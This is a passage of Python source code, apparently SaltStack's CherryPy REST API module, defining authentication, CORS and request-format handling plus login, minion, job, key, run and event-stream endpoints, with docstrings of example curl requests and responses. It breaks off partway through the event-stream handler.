.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e<...snip...>" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
**Other examples**:
.. code-block:: bash
# Sending multiple positional args with urlencoded:
curl -sSik https://localhost:8000 \\
-d client=local \\
-d tgt='*' \\
-d fun='cmd.run' \\
-d arg='du -sh .' \\
-d arg='/path/to/dir'
# Sending posiitonal args and Keyword args with JSON:
echo '[
{
"client": "local",
"tgt": "*",
"fun": "cmd.run",
"arg": [
"du -sh .",
"/path/to/dir"
],
"kwarg": {
"shell": "/bin/sh",
"template": "jinja"
}
}
]' | curl -sSik https://localhost:8000 \\
-H 'Content-type: application/json' \\
-d@-
# Calling runner functions:
curl -sSik https://localhost:8000 \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682' \\
-d outputter=highstate
# Calling wheel functions:
curl -sSik https://localhost:8000 \\
-d client=wheel \\
-d fun='key.gen_accept' \\
-d id_=dave \\
-d keysize=4096
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
** Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
if auth_token is None:
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_sesion.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
